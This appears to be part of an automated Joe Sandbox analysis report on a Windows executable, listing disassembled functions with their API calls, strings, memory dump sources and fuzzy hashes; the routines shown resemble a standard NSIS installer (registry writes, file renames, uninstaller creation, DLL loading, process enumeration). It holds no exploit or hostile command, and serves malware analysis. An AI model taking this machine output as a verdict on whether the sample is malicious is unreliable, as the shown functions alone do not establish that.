                                                                                                                                                                                                                                                                                      • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                                                                      • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                                                                      • API String ID: 20674999-2124804629
                                                                                                                                                                                                                                                                                      • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                                      • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                                                                                                                                                      Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                                                                                                                                      • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                                                                                                                                        • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                                                                                                                                      • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                                      • String ID: F$N$open
                                                                                                                                                                                                                                                                                      • API String ID: 3928313111-1104729357
                                                                                                                                                                                                                                                                                      • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                      • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                                                                                                                                      Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                                                                                                                                      • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                      • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                                      • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                                                                                                                      • API String ID: 565278875-3368763019
                                                                                                                                                                                                                                                                                      • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                                      • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                                                                                                                                      Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                                      • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                                      • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                                      • String ID: F
                                                                                                                                                                                                                                                                                      • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                                      • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                      • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                                                                                                                                      Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                                      • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                                      • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                                      • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                                      • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                                      • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                                      • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                                      • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                                      • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                                      • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                                                                                                                                      Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                                      • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                      • API String ID: 3734993849-3206598305
                                                                                                                                                                                                                                                                                      • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                      • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                                                                                                                                      Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                                      • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                                      • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                                      • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                                      • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                                                                                                                                      Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004279E0,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004279E0,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004279E0,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                                      • `G, xrefs: 0040246E
                                                                                                                                                                                                                                                                                      • Error registering DLL: Could not load %s, xrefs: 004024DB
